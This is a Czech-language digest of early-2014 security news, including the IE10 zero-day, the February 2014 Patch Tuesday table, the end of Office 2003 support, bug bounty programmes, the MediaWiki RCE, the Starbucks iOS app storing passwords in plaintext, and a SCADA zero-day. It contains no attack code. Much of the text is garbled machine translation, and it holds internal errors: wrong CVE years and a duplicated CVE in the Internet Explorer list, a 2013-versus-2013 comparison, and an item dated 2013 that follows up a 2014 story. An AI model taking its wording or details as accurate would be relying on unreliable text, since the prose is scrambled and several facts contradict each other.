Ti, kteří hledají po IE 10 uživatelů chtít dávat pozor na jejich protokoly serveru proxy pro následné na stažení jako potenciální ukazatel.

UPDATE

FireEye poskytly velké množství detailů o útoku ve druhém blogu, který je dobře stojí za přečtení, a dává spoustu ukazatelů kompromisu projet protokolech a filtry:

http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html

[1] http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html


Závažná zero day chyba v Internet Exploreru 10

14.2.2014 Zranitelnosti
Společnost FireEye upozorňuje na to, že útočníci začali aktivně zneužívat zero day zranitelnost v Microsoft Internet Exploreru 10.

Microsoft problém uznal, způsob řešení ale zatím oznámen nebyl. Poslední pravidelná dávka bezpečnostních záplat Microsoftu byla totiž vydána před pouhými 3 dny (únorová sada bulletinů zabezpečení, jako vždy 2. úterý v měsíci). V samotném Internet Exploreru tento balíček opravoval 24 zranitelností, z nichž 15 se týkalo i verze MSIE 10.

FireEye uvádí, že stávající chyba je kritická, protože k instalaci malwaru stačí pouze navštívit podvodný web, uživatel nemusí provádět žádnou další akci (tzv. útok drive-by download) a ze vzdáleného serveru se automaticky stáhne a začne instalovat malware. Použitý exploit dokáže pomocí skriptu v jazyce Flash ActionScript obejít i ochranu ASLR (address space layout randomization, znáhodnění adresního prostoru) ve Windows.

Podíl uživatelů Internet Exploreru 10 po vydání verze 11 klesá, statisticky společnosti Net Applications ale stále uvádějí, že ho má asi 16 % všech uživatelů MSIE (s 37% podílem převažuje verze 8, která je jako poslední k dispozici pro Windows XP).


Microsoft, aby se příští Patch Tuesday světlo
13.2.2014 Zranitelnosti

Microsoft pokračuje v trendu, že začal minulý měsíc, jak udržet Patch Tuesday poměrně lehký. Existuje pouze pět návěstí tento měsíc -. Dvě kritické, tři důležité dva kritické informační zprávy jsou neobvyklé v tom, že se nedotýkaly starší verze systému Windows nebo Internet Explorer. První záplaty vzdálené spuštění kódu, který ovlivňuje Windows 7 až po Windows 8.1, včetně 8.1 RT. Druhý, rovněž vzdálené spuštění kódu, je vlastně otázkou Forefront Protection for Exchange Server (2010). Vzhledem k tomu, umožňující vzdálené spuštění kódu v obvodové služby, jako Forefront, musel bych říci, že je to nejvyšší otázka tato priorita záplatování měsíc. Druhá je, není divu, kritická ve Windows 7 a později. Ostatní tři otázky jsou všechny nižší riziko a pravděpodobně nižší exploitability, od zveřejňování informací na odmítnutí služby a zvýšení úrovně oprávnění. Nesmí být ignorovány, ale měla by být poněkud menší obavy než dálkové kritické zranitelnosti. Autor: Ross Barrett, Senior Manager, bezpečnostní inženýrství, Rapid7.


Nejen Windows XP: Končí i podpora MS Office 2003

13.2.2014 Zranitelnosti
Ačkoliv riziko plynoucí z neaktualizovaného kancelářského balíku je menší než v případě operačního systému, i konec bezpečnostních aktualizací MS Office 2003 je pro zákazníky důležitý.

Windows XP nejsou jediným masově používaným softwarem Microsoftu, jehož podpora se blíží ke svému konci. Spolu s ním bude 8. dubna 2014 vydán poslední balíček záplat také pro MS Office 2003 a MS Exchange 2003.

Absence další nabídky bezpečnostních oprav není ani v případě kancelářského balíku zanedbatelná. Mnohé útoky se provádějí právě přes soubor ve formátu kancelářské aplikace, který je umístěn na webový server nebo zaslán e-mailem.

Analytici Wes Miller ze společnosti Direction a Michael Silver z Gartneru se shodují, že Office 2003 a Windows XP sdílejí v mnoha podnicích společný osud, proto by se konec podpory Office 2003 neměl podceňovat. Windows XP se výrazněji uchytily po vydání Service Packu 2 zhruba ve stejné době, jako přišel na trh MS Office 2003. Podniky pak obvykle přeskočily následující aktualizaci, tedy Vista a Office 2007. Příčinou byla (kromě samotného aktualizačního cyklu) i spokojenost s předcházejícími verzemi softwaru, rozpačité přijetí Windows Vista i ribbonů (pásů karet) v MS Office 2007.

Každopádně tak MS Office do značné míry následuje přijetí Windows. Firmy obvykle přecházely z Windows XP na Windows 7, podobně z MS Office 2003 na verzi 2010. Stejně tak rozpačité je v podnicích zase přijetí Windows 8 i Office 2013.

Oba analytici, Millet a Silver, se ovšem liší v odhadu, nakolik se v prostředích s přetrvávajícími Windows XP provozuje i MS Office 2003. Silver usuzuje, že to bude asi 30-40 %, Millet hádá více. Přesné statistiky k dispozici nejsou, protože penetrace operačních systémů se zjišťuje především při návštěvách webu, kdy se identifikuje prohlížeč, OS pod ním a plug-iny browseru, nikoliv však ostatní aplikace. Další rozbory mají nicméně naznačovat, že kritika ribbonů postupně odeznívala, takže některé firmy aktualizovaly dříve kancelářskou sadu než operační systém. (Mimochodem, Julie Larson-Greenová, která měla v Microsoftu hlavní podíl na volbě ribbonů, je nyní odpovědná mj. za tablet Surface.) Faktem také je, že Windows XP mnohdy přetrvávají nikoliv na klasických PC, ale na vestavěných (embedded) systémech, včetně např. bankomatů.

Ačkoliv riziko plynoucí z neaktualizovaného kancelářského balíku je menší než v případě operačního systému, i konec bezpečnostních aktualizací MS Office 2003 je pro zákazníky důležitý, vždyť v roce 2013 bylo pro tuto verzi určeno 10 bulletinů zabezpečení. Pokud tedy zákazníci chtějí software nadále používat, měli by udělat alespoň několik základních úprav, například zakázat makra.

Nakonec nelze zapomenout ani na to, že současně končí podpora „back-endu“, tedy serveru MS Exchange 2003. I zde se aktualizační cyklus v podnicích podobal Windows a MS Office, tedy vynechána byla verze Exchange 2010 a ve větší míře se upgradovalo až na verzi 2010. Exchange 2003 byl obvykle instalován na Windows Server 2003, který bude podporován do roku 2015. Zde může upgrade být spojen s další komplikací: Windows Server 2003 byl ještě k dispozici i ve 32bitové verzi, následující serverový software již jen jako 64bitový. V některých případech se přechod na vyšší verze proto možná odkládal (odkládá) kvůli hardwaru.


Google ups odměny pro software třetích stran náplastí
12.2.2014 Zranitelnosti | Bezpečnost
Google se neustále vylepšování své chyby odměnu a oprava věrnostní program , a poslední změna spočívá dalšího rozšíření působnosti a odměn částka zvyšuje. "Ode dneška budeme rozšiřovat rozsah našeho zranitelnost věrnostní program také zahrnuje všechny aplikace Chrome a rozšíření vyvinuté a označen jako "Google" , oznámil Eduardo Vela Nava a Michal Zalewski z týmu Google Security Team. "Myslíme si, že rozvoj Chrome rozšíření bezpečně je poměrně snadné (vzhledem naše zásady bezpečnosti jsou dodržovány), ale vzhledem k tomu, že rozšíření, jako jsou setkání a GMail jsou široce použít, chceme, aby se ujistil úsilí, aby jejich bezpečné odpovídajícím způsobem odměněn. " Odměny zůstávají stejné -. mezi $ 500 až $ 10.000 zranitelnosti v závislosti na závažnosti jeho vlivu Je to v poslední době představil experimentální oprava odměn programu pro podporu výzkumných pracovníků, vytvořit bezpečnostní opravy pro software třetích stran, který odměny byly zvýšeném. Zpočátku, po jejich podání byl přijat a zahrnut do konečného kódu softwaru, Google bude odměňovat výzkumníky s částkou mezi $ 500 až $ 3,133.7. Nyní, rozsah je vyhrazeno pro podání nabídek, že "jsou velmi jednoduché, nebo které nabízejí jen velmi spekulativní zisky," zatímco 5000 dolar bude rozdávat za "středně složité opravy, které poskytují přesvědčivé bezpečnostní výhody," a 10.000 dolary za "složité, zlepšení vysokým dopadem, který téměř jistě brání slabiny v postiženém kódu.


Adobe Flash chyba využívány v přírodě, nyní aktualizovat
12.2.2014 Zranitelnosti
Adobe vydala nouzovou opravu pro kritickou zranitelnost postihuje Flash Player pro Windows, Linux a OS X, využívání, které může mít za následek útočník získává dálkové ovládání systémů obětí.

Podle Adobe bezpečnostní poradenství , chyba je aktivně využíván ve volné přírodě, ale na rozdíl od připsání svůj objev vědců Alexander Polyakov a Anton Ivanov společnosti Kaspersky Lab, se žádné podrobnosti o probíhajícím útoku byly sdíleny. příspěvek zveřejněný v pondělí na Kaspersky Lab Securelist blog ukazuje, že jejich vědci odhalili nový sofistikovaný cyberespionage operaci, která, mimo jiné, byl schopen ohrozit Mac a počítače se systémem Linux. Zdá se pravděpodobné, že chyba Flash je mezi těmi zadlužuje útočníky, ale vyhráli jsme "Nevím jistě, dokud další podrobnosti o této operaci jsou sdíleny příští týden. , ale neměli byste čekat realizovat opravu. Pokud používáte Adobe Flash Player 12.0.0.43 a starší verze pro Windows a Macintosh nebo Adobe Flash Player 11.2.202.335 a starších verzích pro Linux, navštivte Adobe Flash Player Download Center a vyberte ji. Pokud používáte Flash vložený v Chrome, nebo Internet Explorer , aktualizujte svůj prohlížeč na nejnovější, non-zranitelných verzí. UPDATE: výzkumníci společnosti Kaspersky Lab vydala další technické podrobnosti .


02. 2014 Microsoft Patch Tuesday
11.2.2014 Zranitelnosti

Přehled 02. 2014 Microsoft záplaty a jejich stav.

# Ovlivněno Kontraindikace - KB Známé Využije Hodnocení Microsoft (**) ISC hodnocení (*)
klienti servery
MS14-005 Přístup k informacím Chyba zabezpečení ve službě Microsoft XML kód Services
(Nahrazuje MS10-051 )
Microsoft XML Core Services CVE-2014-0266
KB 2916036 Ano. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS14-006 IPv6 Denial of Service
(nahrazuje MS13-065 )
TCP / IP Stack (IPv6) CVE-2014-0254
KB 2904659 Ano. (Vuln. známo) Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS14-007 Vzdálené spuštění kódu v Direct2D
(Nahrazuje)
Direct2D CVE-2014 až 0263
KB 2912390 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Důležitý
MS14-008 Umožnit vzdálené spuštění kódu v aplikaci Microsoft Forefront
(nahrazuje)
Microsoft Forefront CVE-2014-0294
KB 2927022 Ne. Závažnost: Kritická
zneužitelnosti: 1 N / A Kritický
MS14-009 Zvýšení úrovně oprávnění chyby zabezpečení v rozhraní. NET Framework
(Nahrazuje MS13-052 , MS11-100 )
. Net Framework CVE-2014-0253 CVE-2014-0257 CVE-2014-0295

KB 2916607 Ano. Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS14-010 Kumulativní aktualizace zabezpečení pro aplikaci Internet Explorer
(nahrazuje MS13-097 )
Internet Explorer CVE-2014-0267 CVE-2013-0268 CVE-2013-0269 CVE-2013-0270 CVE-2013-0271 CVE-2013-0272 CVE-2013-0273 CVE-2013-0273 CVE-2013-0274 CVE-2013-0275 CVE-2013-0276 CVE-2013-0277 CVE-2013-0278 CVE-2013-0279 CVE-2013-0280 CVE-2013-0281 CVE-2013-0283 CVE-2013-0284 CVE-2013-0285 CVE-2013-0286 CVE-2013-0287 CVE-2013-0288 CVE-2013-0289 CVE-2013-0290 CVE-2013-0293

KB 2909921 Ano
(CVE-2014-0267) Závažnost: Kritická
zneužitelnosti: 1 Patch TEĎ! Důležitý
MS14-011 Vzdálené spuštění kódu v jazyce VBScript skriptování
(nahrazuje MS10-022 )
VBScript CVE-2014-0271
KB 2928390 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Kritický


Windows, IE, Java jsou nejzranitelnější
11.2.2014 Zranitelnosti
Při srovnání s čísly z předchozího roku 2013 došlo k nárůstu v zjištěnými chybami zabezpečení, a co víc, řada kritických zranitelností se také zvýšil -. Když je to podstatně menší než v roce 2009 researchers GFI have pročesána podrobnosti poskytovaných Vulnerability Database US National (NVD), a zjistili, že v roce 2013, v průměru 13 nových zranitelností byly hlášeny každý den, přinášet úhrn k 4794 -. 447 více než v roce 2013, 50 procent z chyb bylo nalezeno v produktech pouze 10 dodavatelů z 760:

Čísla jsou tak dokladem toho, že množství různých nabídek tyto velké firmy mají a na jejich popularitě, které se přirozeně ukazuje na to, že jsou častěji terčem hackerů a analyzovány výzkumníky bezpečnosti pro bezpečnostní nedostatky. Oracle je na špičce seznamu není jen proto, že Java zranitelnosti, ale také z důvodu hardwarových chyb nalezených v podnikových zařízeních. Přesto, že Microsoft nemůže povzdech povzdech ot úlevu, protože společnost měla obrovský nárůst "vysoce rizikových" zranitelností ve srovnání s 2012 čísly. Kritické zranitelnosti nalezené v jeho různých operačních systémů z Microsoft obsadit 8 prvních 9 míst na seznam většiny cílových operačních systémů v roce 2013:

A konečně, Microsoft Internet Explorer, Oracle Java a Google Chrome skončil obsazení prvních tří míst (v tomto pořadí) na seznamu nejvíce cílených aplikací. "Z bezpečnostního hlediska, Oracle a Java měla špatný rok, v roce 2013 se 193 chyb než pro Java, 102 z nich kritické, " poznamenal GFI křesťanskou Florian. "Aby toho nebylo málo, vysoký počet kritických zranitelností v Javě byly nulové dny nedostatky." Další věc, vzít v úvahu, je skutečnost, že počítačoví útočníci mají přednost využívání Java zranitelnosti, protože software lze nalézt na mnoha počítačů, kteří provozují různé operační systémy. zachování všech na tuto skutečnost, nejlepší rada, se můžete dostat k bezpečnému uchování je i nadále udržet váš operační systém, aplikace a bezpečnostní software aktuální, a odebrat software který nepoužíváte, nebo je potřeba tak, aby se minimalizovalo útoku.


GitHub nastaví chyba nájemný programu
8.2.2014 Zranitelnosti
GitHub je nejnovější služba oznámila, že oni začali bezpečnostní chyba bounty program. "Myšlenka je jednoduchá: hackeři a výzkumníci bezpečnostních najít a nahlásit chyby zabezpečení prostřednictvím našeho odpovědného procesu zveřejňování Pak uznat značné úsilí, aby tito výzkumníci často vztáhl. při lovu se chyby, budeme odměnou jim s trochou studené tvrdé hotovosti, "uvedli ve svém blogu ve čtvrtek. Odměny se budou pohybovat od 100 dolarů až na $ 5000 a skutečné částky, které mají být rozhodnuto tým na případ od případu podle , a tím, že v úvahu řadu faktorů. "Například, pokud zjistíte, že odražené XSS, které je možné pouze v Opeře, a Opera je <2% našeho provozu, pak závažnost a odměna bude nižší. ale přetrvávající XSS, který pracuje v Chrome, při> 60% našeho provozu, bude vydělávat mnohem větší odměnu, "vysvětlili. Zpočátku se bug bounty omezena na zranitelnosti objevené v hlavním webových stránkách GitHub je ( Github.com ), na GitHub API, a GitHub Gist, služba pro sdílení úryvky kódu nebo jiného obsahu textu. Tým říká, že budou reagovat tak rychle, jak je to možné tím, co tvrdí, a udržet zadavatel aktualizován pracují na opravy chyby. "Nebudeme podniknout právní kroky proti vám, pokud budete hrát podle pravidel , "oni se o to přidat.


Check Point zjistí kritickou zranitelnost v MediaWiki
8.2.2014 Zranitelnosti
Check Point našel kritickou zranitelnost v MediaWiki projektu webové platformy, populární open source webové platformy používané k vytváření a udržování "wiki" webů. Platforma MediaWiki zahrnuje Wikipedia.org, s více než 94 milionů unikátních návštěvníků měsíčně. Check Point vědci zjistili, že tato kritická zranitelnost vlevo MediaWiki (verze 1.8 a dále) vystaveny ke vzdálenému spuštění kódu (RCE), kde útočník získat úplnou kontrolu nad zranitelný webový server. Tato chyba byla přiřazena CVE-2014-1610 organizace MITRE. K tomu, aby na webu bylo zranitelné, musí být specifické pro ne-výchozí nastavení povoleno v nastavení MediaWiki. Zatímco přesný rozsah dotčených organizací je neznámý, tato chyba zabezpečení byla potvrzena vliv některé z největších známých MediaWiki nasazení na světě. Oni upozornil Wikimedia Foundation o zranitelnosti, a po ověření, Foundation vydala aktualizace a opravy k MediaWiki software. Před dostupnosti patch pro tuto chybu zabezpečení, by útočník mohl podali malware infekce kód do každé stránky na Wikipedia.org, stejně jako do jakékoli jiné vnitřní nebo Web-čelí wiki stránky běží na MediaWiki s postiženými nastavení. Od roku 2006 je to teprve třetí RCE zranitelnost našel na platformě MediaWiki. "Zabere to jen jednu chybu na všeobecně přijaté platformu pro hacker proniknout a způsobit rozsáhlé škody. Check Point Vulnerability Research Group se zaměřuje na zjištění těchto bezpečnostních expozic a zavedení nezbytných real-time ochranu pro zabezpečení Internetu. Jsme rádi, že platforma MediaWiki je nyní chráněn proti útokům na tuto chybu zabezpečení, která by, které představují velké bezpečnostní riziko pro miliony každodenních uživatelů "wiki" na místě, "řekl Dorit Dor, viceprezident pro produkty společnosti Check Point Software Technologies.


Starbucks opravuje chybu s heslem v jeho aplikaci iOS
28.1.2013 Zranitelnosti | Mobil

Pokud jste postupovali minulý týden humbuk o aplikaci Starbucks iOS nalezeno ukládání hesel a umístění souřadnic ve formátu prostého textu, a máte obavy o vaše informace je ohrožena, aktualizovat aplikaci a nic víc starat. Starbucks řekl, že má pevnou problém v nová verze (2.6.2) z aplikace iOS a podle Daniela Wood, výzkumný pracovník, který původně objevil bezpečnostní chybu, problém je nyní vyřešen. aplikace není již ukládat hesla Starbucks účtu ve formátu prostého textu (heslo je nyní uloženy v Apple šifrované klíčenka), a zaznamenává pouze souřadnice posledního místa, kde má zákazník použitého jejich zařízení. "Jako takový, nevěřím, že tento obrázek je bezpečnostní problém, neboť není souhrnné údaje o zeměpisné poloze v průběhu času," řekl uvedeno v e-mailu zaslaného na mailing listu Full Disclosure. "Váš uloženy Geolocation je přepsán pokaždé a nemůže být použit ke sledování své pohybové vzory v průběhu času." Dodal také, že chyba nebyla tak vážná, jak média dělal to být. "Během počátečního testování aplikací, a to bez Šlo dat tam kreditní karty obsažené v tomto souboru, pouze vaše číslo Starbucks Card a množství váhy. V žádném okamžiku byly datové servery Starbucks v ohrožení, odhalení jejich 10 milionů zákazníků na aplikaci, jak se domnívají některé zprávy. Jednalo se o místní zneužít zranitelnost na Uživatelé zařízení, nikoli vzdáleně zneužít zranitelnosti na svých serverech, nebo jakýkoli jiný typ umožňující vzdálené spuštění kódu. " Jako vedlejší poznámku: Wood říká, že on byl "v nepřetržitém spojení s Starbucks", zatímco společnost pracuje na stanovení chybu . Podle Evan Schuman , Wood byl dočasně uloženy u společnosti jako bezpečnostní poradce (i když neplacená v současné době).


Výzkumník ukazuje SCADA zero-day, akcie PoC
27.1.2014 Zranitelnosti

Italský vědec dobře známý pro jeho zkoumání průmyslových řídicích systémů (ICS) prokázal vykořisťování a zero-day chybu, která může způsobit pád nebo vést ke kompromisu Web-based SCADA software, který se používá v téměř 40 zemích po celém světě . Luigi Auriemma, který je také spoluzakladatel a generální ředitel společnosti Malta na bázi start-up ReVuln, že sdílí informace zranitelnost se svými platících zákazníků, představila útok na účastníky z SCADA Security vědecké sympozium konalo tento týden v Miami na Floridě. zranitelný software v otázce je IntegraXor, dispečerské řízení a sběr dat / human-machine interface (SCADA / HMI) produkt vyvinutý Malajsie založené výrobce Ecava. Chyba je přetečení bufferu chyba, která může být využita na dálku provádět servisní útok DoS OD, jsou-li splněny určité podmínky, nebo dokonce ke spuštění škodlivého kódu v systému. Toto zveřejnění zranitelnosti vedla ICS-CERT vydávat upozornění ve čtvrtek a naléhat na prodejce o potvrzení této chyby zabezpečení a určit snižující závažnost rizika co nejdříve. Společnost reagovala téměř okamžitě, a v pátek se potvrdilo , že se oprava na oznámenou chybu zabezpečení a vydala opravu, která je součástí nejnovější verze softwaru. "Jeden z předpokladu této zranitelnosti je mít úplnou cestu k projektu adresy URL. Takže prosím, vyhnout se sdílet nebo publikovat nasazen projektu adresu. A také zabránit používat číslo portu systému výchozí," Vývojáři vyzval uživatele, s tím, že by to mohlo být dobrý moment pro aktualizaci softwaru, jako vada nebude pevně ve starších staví.


Microsoft rozšiřuje podporu pro řešení zabezpečení Win XP, aby v polovině-2015

26.1.2014 Zranitelnosti | Bezpečnost

Navzdory tomu, že oznámil začátkem tohoto měsíce, že by přestala poskytovat aktualizace signatur pro Security Essentials pro Windows XP v 08.04.2014 - stejné datum, kdy systém Windows XP dosáhne konce své životnosti a podporu - Microsoft udělal o otáčky a rozhodl se pokračovat poskytnout aktualizace svého antimalware podpisy a motorem pro uživatele Windows XP prostřednictvím 14.července 2015.

"To nemá vliv na koncové-of-Support datum Windows XP nebo supportability Windows XP pro jiné produkty společnosti Microsoft, které poskytují, a uplatňovat tyto podpisy", které je vysvětleno v blogu. "Pro podnikové zákazníky, to platí i pro System Center Endpoint Protection, Forefront Client Security, Forefront Endpoint Protection a Windows Intune v systému Windows XP. Pro ​​spotřebitele to platí pro Microsoft Security Essentials. " Rozhodnutí bylo pravděpodobně ovlivněno, že některé 30 procent uživatelů se ještě přepnout na novější verze Windows, a zdá se, že nejsou ve spěchu, přestože Microsoft, co byl velmi hlasitý o plánovaném skončení lhůty pro jeden z jejich nejpopulárnější verzí operačních systémů podpory. "Náš výzkum ukazuje, že účinnost antimalware řešení ven -of-podpora operačních systémů je omezená, "varují, ačkoli. "Spuštění dobře chráněné řešení začíná s využitím moderního software a hardware určený k ochraně proti dnešním hrozeb." Další důležitou věcí je, aby zvážila, že výzkumníci bezpečnostní předpovídají , že počet aktivních kampaní, které používají Windows XP využije budou stupňovat. Pokud trváte o použití starého OS, musíte být vědomi toho, že i když bezpečnostní řešení Microsoft stále přijímat nové podpisy, to neznamená, že jste v bezpečí. Když byste zvážit přechod na jednom z novějších verzí, zde je seznam alternativních AV řešení, které lze použít v mezidobí.


Starbucks iOS app ukládá hesla ve formátu prostého textu

26.1.2014 Mobil | Zranitelnosti
Bezpečnostní výzkumník zjistil, že se pokusil Starbuck iOS Mobilní aplikace ukládá Uživatelé "uživatelská jména, e-mailové adresy a hesla ve formátu prostého textu, a sdílet tento objev se společností měsíců. Nicméně, poté, co opakovaně byly převedeny na zákaznický servis, Daniel Wood rozhodl jít na veřejnost s jeho objevem na Full Disclosure konferenci v pondělí. "Uživatelské jméno, e-mailovou adresu a heslo prvky jsou uloženy ve formátu prostého textu-v session.clslog Crashlytics log soubor, "vysvětlil. "V session.clslog existuje více instancí skladování prostého textu pověření, které mohou být navrácena, a spekulativní za neoprávněné použití několika uživatelů účtu na vlastním zařízení uživatele se zlými úmysly ", nebo on-line na https://www.starbucks.com/ účet / signin . Obsahuje HTML stránky mobilních aplikací, který vykonává účet login nebo vynulování účtu. session.clslog také obsahuje OAuth tokenu (podepsal s HMAC-SHA1) a podpis protokolu OAuth pro uživatele účet / zařízení do provozu Starbucks . " Nebezpečí spočívá především v tom, že aplikace se používá k provedení nákupu na Starbuck, a někteří uživatelé povolit možnost automatického doplňování, což umožňuje aplikace přístup k bankovnímu účtu uživatelů a převést peníze z něj jejich Starbucks účet. zloděj, který krade uživatele iPhone nebo přítele, který ji půjčí, a ví, co má dělat a jaký nástroj použít můžete snadno získat přístup k výše uvedené souboru, i když je telefon zamknutý, řekl Wood Evan Schuman . Díky kombinaci uživatelského jména / hesla, může se vyprázdnit Starbucks účet oběti buď přes aplikaci (pokud se hádá PIN), nebo prostřednictvím webové stránky Starbucks. Dalším, může vážnější problém nastat v případě, že oběť používá stejné přihlašovací údaje pro více důležitých účtů . Vzhledem k tomu, veřejné vydání informací o této bezpečnostní chyby, Starbucks manažeři potvrdili, že věděli o jeho existenci, a že se zavedly odpovídající bezpečnostní opatření pro vyřešení chybu. Neměli určit, jaký druh opatření zavedených, ale Wood říká, že chyba je stále přítomen v nejnovější verzi aplikace. Tentokrát si také všiml, že soubor s historií Geolocation obsahuje také informace ve formátu prostého textu -. Informace, které mohou být použity k objevovat pohyby oběti Ve svém příspěvku na Plný seznam Disclosure, Dřevo, nabídl radu o tom, jak zmírnit tento problém, a má také sdílený seznam iOS konkrétních osvědčených postupů, pokud jde o ukládání dat, která app vývojáři měli realizovat. Ale jen čas může říct, jestli Starbucks bude naslouchat.


Světlo Patch Tuesday blíží
18.1.2014 Zranitelnosti

se rozjíždí do lehkého startu s Microsoftem. Pouze čtyři informační zprávy v předem oznámení lednového. Poprvé ve chvíli, není kumulativní IE srolovat náplast. To musí být znamení, že tým IE byl nakonec dovolen vzít nějaký čas volno přes prázdniny s ohledem na vyčerpávající 2013 dali dovnitř Očekávat, že již v únoru, není pochyb. Druhý bulletin, pravděpodobně MS14-002, se bude zabývat poněkud očekávané jádro zvýšení oprávnění otázek, známých jako CVE-2013-5065, který byl vykázán, a zveřejněných v listopadu s nějakým omezeným využití ve volné přírodě. Problém se týká pouze Windows XP a systémy 2003, ale pokud používáte ty bych to považují za něco opravit rychle. Třetí bulletin je další zvýšení vydání oprávnění ovlivňující Windows 7 a 2008, takže pokud jste se vyhnul kulce s CVE-2013 -5065, jste stále ovlivněny jeden. No jak se z něj v tomto měsíci. Čtvrtý bulletin je odepření služby ve zřídka viděný Microsoft Dynamics produktu. To je asi tak marginální obavy, jak se můžete dostat do, pokud jde o MS rad. je to docela snadné priorit v tomto měsíci. Patch MS14-001, a pak podle toho, o 002 nebo 003 se na vás vztahují. Patch DoS v MS Dynamics, když jste opravdu nudí někdy ... ne, dělám si srandu. Máte-li Dynamics ve svém prostředí, to nelze přehlížet to. Je to typ systému, kde výpadek může mít materiální náklady pro vaše podnikání. autor: Ross Barrett, Senior Manager Security Engineering, Rapid7.


Microsoft Patche GDI + Zero Day; Odborníci nutkání Bližší pohled na "důležité" ASLR Bypass

11.12.2013 Zranitelnosti

Jeden zero-day dole, jeden jít.

Jak se dalo očekávat, Microsoft udělal dnes náplast na zero-day ve svém GDI + grafika složka ( MS13-096 ) hlášen před více než měsíc poté, co využije byl spatřen ve volné přírodě. Oprava byla jedna z 11 bezpečnostních bulletinů-pět kritických vydána jako součást 12. 2013 aktualizace zabezpečení Patch Tuesday.

Další zero-day, jeden ovlivňuje pouze uživatelům Windows XP, stále unpatched přes aktivní činů zaměřených na zranitelnost, který se nachází v ovladači NDProxy, který spravuje Microsoft Telephony API. Útoky jsou závislé na druhém zranitelnosti dodat využít proti stroji XP. Společnost Microsoft doporučuje vypnout NDProxy jako zmírnění, dokud patch je k dispozici.

Zatímco tam bylo pět kritických bulletiny dnes zveřejnila, experti nutkání IT správcům i priority o ASLR bypass chybu zabezpečení, která byla opravenou dnes a jmenovitou "důležité" Microsoft.

MS13-106 se postará o zranitelnosti Office, který je využíván ve volné přírodě, řekl Microsoft. Útočníci hosting škodlivý využít on-line může vyvolat zranitelnost v hxds.dll, který umožňuje obchvat ASLR nebo adresového prostoru Layout Randomization, funkce zabezpečení v systému Windows, která zmírňuje paměti využije korupce.

"Tato chyba zabezpečení by mohla umožnit bezpečnostní funkce bypass, pokud uživatel zobrazí speciálně vytvořenou webovou stránku ve webovém prohlížeči schopného instancí COM komponenty, jako je Internet Explorer," uvedl Microsoft ve svém poradenství. "Funkce zabezpečení bypass sám o sobě neumožňuje spuštění libovolného kódu. Nicméně, by útočník mohl použít tuto ASLR obejít chybu ve spojení s jiným zranitelnosti, jako je například vzdálené spuštění kódu, která by mohla využít na ASLR obchvatu spustit libovolný kód. "

ASLR obchvaty byly častější v letošním roce, a které byly stočeny do počtu využívají sad. Zavedena v systému Windows Vista, ASLR brání spolehlivost využije negací schopnost útočníka předpovědět, kde strojové instrukce budou existovat v paměti. ASLR je zvláště účinný proti buffer overflow útoky.

"Tento konkrétní knihovna, hxds.dll, byl používán mnoha útoků ve volné přírodě s velkým úspěchem, protože je lze snadno načíst do paměti z webové stránky pomocí" ms-help: 'popisovač protokolu, "řekl Craig Young, Bezpečnostní výzkumník na Tripwire. "Až do dnešního dne pouze možnosti, které chrání proti tomuto bylo odstranění Office 2007/2010 instaluje a umožňuje společnosti Microsoft Enhanced Experience Toolkit pro zmírňování (Emet)."

Správci budou muset potýkat také s dalším kumulativní aktualizace pro aplikaci Internet Explorer. MS13-097 záplat řadu vzdálené spuštění kódu zranitelnosti v prohlížeči, celou cestu zpět do IE 6. IE je oprava téměř každý měsíc v tomto roce a byl v popředí v mnoha cílených útoků.

Microsoft také oprava kritickou chybu ve svém Authenticode podpisového algoritmu, který je zneužívanou. MS13-098 umožňuje vzdálené spuštění kódu, pokud uživatel se zlákat ke spuštění aplikace, která obsahuje škodlivý a podepsaný přenosné provedení souboru. Patch upravuje, jak funkce WinVerifyTrust zpracovává Windows Authenticode ověření podpisu pro soubory PE, řekl Microsoft.

"Útočníci byli zneužívání instalátory z legitimních výrobců softwaru nainstalovat malware. Tyto instalační jsou konfigurovány tak, aby dynamicky stahovat rozšíření kódu, které nejsou kontrolovány pro správné podpisy, a útočníci našli způsob, jak se na zádech na tomto mechanismu, "řekl Qualys CTO Wolfgang Kandek, který dodal, že oprava připravuje systém více přísná kontrola integrity, která brání takové zneužití. Microsoft také vydal samostatný bezpečnostní poradenství , pokud jde o Authenticode náplasti, která po 10.6.2014 bude již rozpoznat nevyhovující podepsané binární soubory.

Zbývající dvě kritické bulletiny, MS13-099 a MS13-105 , propojovací vzdálené spuštění kódu chyby zabezpečení v aplikaci Microsoft Scripting Runtime knihovny objektů a Exchange Server, resp. Tři ze čtyř Exchange chyby zabezpečení v bulletinu, že to stojí za zmínku, jsou zveřejněny. Nejvážnější je v WebReady prohlížení dokumentů a DLP funkcí Exchange Serveru, řekl Microsoft.

Zbývající bulletiny s hodnocením "důležité" Adresa jeden vzdálené spuštění kódu chyba, tři otázky eskalaci práv a zpřístupnění informací zranitelnosti:

MS13-100 nášivky vzdálené spuštění kódu v aplikaci Microsoft SharePoint Server, musel by být ověřeny na server tuto chybu zabezpečení zneužít. Úspěšný využití by umožnit útočníkovi spustit kód v kontextu w3wp účtu služby na webu služby SharePoint.
MS13-101 řeší problém zvýšení úrovně oprávnění v systému Windows ovladače režimu jádra. Útočník by musel přihlásit do systému a spustit škodlivý aplikace využívat chybu.
MS13-102 je oprava pro chybu zabezpečení v klientovi LRPC, která by mohla útočníkovi umožnit zvýšit své oprávnění na LRPC serveru. To by mohlo útočníkovi dovolit instalovat programy, manipulovat s daty nebo vytvořit účet. Platné pověření jsou potřeba využít tuto chybu.
MS13-103 nášivky chybu zabezpečení v ASP.NET SignalIR, které by mohly zvýšit oprávnění útočník, pokud jsou schopni reflektovat Javascript zpět do prohlížeče uživatele. Microsoft také vydal poradenství pro chyby v zobrazení stavu technologie ASP.NET, která existuje, když je stroj Authentication Code (MAC) validace vypnuta pomocí nastavení konfigurace.
MS13-104 je oprava pro chybu zabezpečení typu zpřístupnění informací v aplikaci Microsoft Office. Úspěšné využije mohl dát přístupové tokeny útočník používané k ověření uživatele na serveru SharePoint nebo serverovny Office.
